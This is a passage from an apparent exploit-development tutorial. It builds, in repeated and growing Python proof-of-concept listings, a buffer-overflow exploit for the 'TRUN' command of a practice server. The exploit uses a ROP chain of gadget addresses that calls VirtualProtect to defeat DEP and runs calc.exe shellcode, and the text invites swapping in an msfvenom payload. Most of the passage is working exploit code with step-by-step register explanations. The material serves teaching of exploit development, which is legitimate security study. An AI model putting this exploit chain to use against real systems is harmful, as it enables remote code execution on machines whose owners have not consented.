# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains a value of the return parameter. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add β€œdummy” data directly AFTER the first ROP gadget. That way, that β€œdummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment:

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now , our shellcode is about 100 hex bytes, or about 256 bytes away, from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the value of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 100 bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, β€œhow the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change what the memory addresses in ECX and EDX point to. Right now, they contain memory addresses- but they are not pointers to anything.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the DWORD value (size of an x86 register) ECX is currently pointing to (which is the return parameter) and change that value, to make that DWORD in ECX (the address of return) point to EAX’s value (the shellcode address).

To clarify- here we are not making ECX point to EAX. We are making the return address point to the address of the shellcode. That way on the stack, whenever the memory address of return is anywhere, it will automatically be referenced (pointed to) by the shellcode address.

We also need to do the same with EDX. EDX contains the parameter placeholder for lpAddress at the moment. This also needs to point to our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The memory address containing the return parameter (filled with 0x4c4c4c4c originally) placeholder was successfully manipulated to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number that comes after ret refers to the number of bytes that should be removed from the stack. C, in decimal, is 12. 12 bytes would refer to three 4-byte values in x86 (Each 32-bit DWORD memory address contains 4 bytes. 4 bytes * 3 values = 12 total). These types of returns are used to β€œclean up” items on the stack, by removing items. Essentially, this just removes the next 3 memory addresses after the ret is executed.

In any case- just as pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C will remove three memory addresses off of the stack. First, the return instruction takes the current stack pointer at the time of the ret 0x000C instruction (which would be the next ROP gadget in the chain) and loads it into EIP. EIP then executes that address as normally. That is why no padding is needed at that point. The 0x000C portion of the return from the now previous ROP gadget kicks in and takes the next three memory addresses removed off the stack. This is the reason why padding for ret NUM instructions are implemented in the NEXT ROP gadget instead of directly below, like pop padding.

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter about 300 hex bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Make the current size parameter placeholder point to this newly calculated value


  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will β€œzero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:


Then, we need to find a gadget to get 300 into EAX. We have already found a gadget from one of the previous gadgets! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (100 * 3 = 300). Remember, under each add eax, 0x00000100 gadget, to add a line of padding to compensate for the pop ebp instruction.

The last step is the pointer.

Right now, EDX (the register itself) still holds a value that is equal to the lpAddress parameter placeholder. We will increase EDX by four bytes- so it reaches the size parameter placeholder. We will also reuse an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Again, that pesky ret 0x000C is present again. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by β€œzeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:


Next we need the value of 0x40 in EAX. I could not find any viable pointers through any of the ROP gadgets I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make-do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll

Again, EDX is now pointed to the size parameter placeholder. Using EDX again, increment by four- to place the location of the flNewProtect placeholder parameter in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewPRotect resides:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os

import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
